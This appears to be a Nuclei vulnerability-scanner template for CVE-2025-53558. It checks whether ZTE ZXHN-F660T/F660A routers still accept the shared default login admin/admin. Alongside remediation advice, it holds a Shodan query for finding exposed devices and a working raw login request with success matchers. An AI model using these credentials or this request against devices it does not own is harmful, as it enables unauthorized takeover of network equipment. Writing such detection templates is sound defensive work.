id: CVE-2025-53558 info: name: ZTE ZXHN-F660T/F660A - Default Credentials author: DhiyaneshDK severity: high description: | ZXHN-F660T and ZXHN-F660A provided by ZTE Japan K.K. use a common credential for all installations. With the knowledge of the credential, an attacker may log in to the affected devices. impact: | Attackers with knowledge of common credentials can access ZTE device management interfaces, potentially gaining control over network equipment and configurations. remediation: | Change default credentials immediately and restrict access to the web management interface to trusted administrators only. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-53558 - https://jvn.jp/en/jp/JVN66546573/ metadata: shodan-query: title:"F660" verified: true max-request: 1 tags: cve,cve2025,default-login,zte,vuln,vkev variables: username: "admin" password: "admin" http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}} frashnum=&action=login&Frm_Logintoken=0&Username={{username}}&Password={{password}} matchers-condition: and matchers: - type: word part: location words: - "/start.ghtml" - type: status status: - 302 - type: word part: body words: - "wrong username" - "User information is error" negative: true # digest: 4a0a00473045022100b328632536b25e561fa3ee75cecae88b4c331faf7eb537b934555d6259ad40e402206953d0ec987bdc4c4a43742cb127346de25e8661f041ba58b27b22aea510b42c:922c64590222798bb761d5b6d8e72950